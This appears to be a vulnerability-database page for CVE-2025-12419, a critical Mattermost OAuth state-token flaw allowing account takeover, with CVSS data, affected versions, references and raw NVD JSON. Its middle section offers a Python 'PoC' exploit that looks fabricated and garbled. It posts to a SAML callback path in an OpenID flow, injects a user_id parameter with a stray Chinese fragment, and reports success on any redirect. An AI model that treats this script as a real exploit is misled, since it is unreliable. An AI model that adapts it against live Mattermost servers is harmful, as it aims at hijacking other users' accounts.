CVE-2025-12419

Description

Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 10.12.x <= 10.12.1

Mattermost 10.11.x <= 10.11.4

Mattermost 10.5.x <= 10.5.12

Mattermost 11.0.x <= 11.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12419 Mattermost OAuth Account Takeover PoC # Requirements: Two SSO accounts, one never logged into Mattermost # Target: Mattermost <= 10.12.1, <= 10.11.4, <= 10.5.12, <= 11.0.3 import requests import urllib.parse TARGET = "https://vulnerable-mattermost.example.com" SSO_PROVIDER = "https://sso.example.com" ATTACKER_SSO_ACCOUNT = "[email protected]" TARGET_SSO_ACCOUNT = "[email protected]" def exploit_oauth_takeover(): """ OAuth Account Takeover Attack Chain: 1. Attacker authenticates with first SSO account 2. Intercept OAuth callback and manipulate state token 3. Bind target user identity to attacker's Mattermost session """ # Step 1: Initiate OAuth flow with attacker's SSO account auth_url = f"{TARGET}/oauth/authorize" params = { "client_id": "mattermost_client", "redirect_uri": f"{TARGET}/oauth/complete/saml", "response_type": "code", "scope": "openid profile email", "state": "attacker_state_token" } print(f"[+] Step 1: Initiating OAuth with attacker account: {ATTACKER_SSO_ACCOUNT}") # Step 2: Capture the OAuth callback after SSO authentication callback_url = f"{TARGET}/oauth/complete/saml?code=auth_code&state=attacker_state_token" # Step 3: Exploit state token validation flaw # Modify the callback to inject target user identity exploit_callback = f"{callback_url}&user_id={TARGET_SSO_ACCOUNT}&绑定的用户身份" print(f"[+] Step 2: Manipulating OAuth callback with target user: {TARGET_SSO_ACCOUNT}") # Step 4: Complete the OAuth flow with manipulated data response = requests.get(exploit_callback, allow_redirects=False) if response.status_code in [302, 303]: print("[+] Step 3: Account takeover successful!") print(f"[+] Attacker now has access to target user: {TARGET_SSO_ACCOUNT}") return True print("[-] Attack failed - check requirements (email verification disabled, OAuth enabled)") return False if __name__ == "__main__": exploit_oauth_takeover()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12419/
[4] VulDB https://vuldb.com/cve/CVE-2025-12419
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12419", "sourceIdentifier": "[email protected]", "published": "2025-11-27T16:15:46.957", "lastModified": "2025-12-03T15:17:16.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.13", "matchCriteriaId": "91D99F7F-B4EE-447C-9B77-82DD64B1D83A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.5", "matchCriteriaId": "A8368192-621C-4043-827E-DB4F6946AD92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.2", "matchCriteriaId": "ED48D731-6490-4DD5-94D4-EE4555BB93ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.4", "matchCriteriaId": "387D98AD-59D7-4783-B0D2-E5CF2F7343B0"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}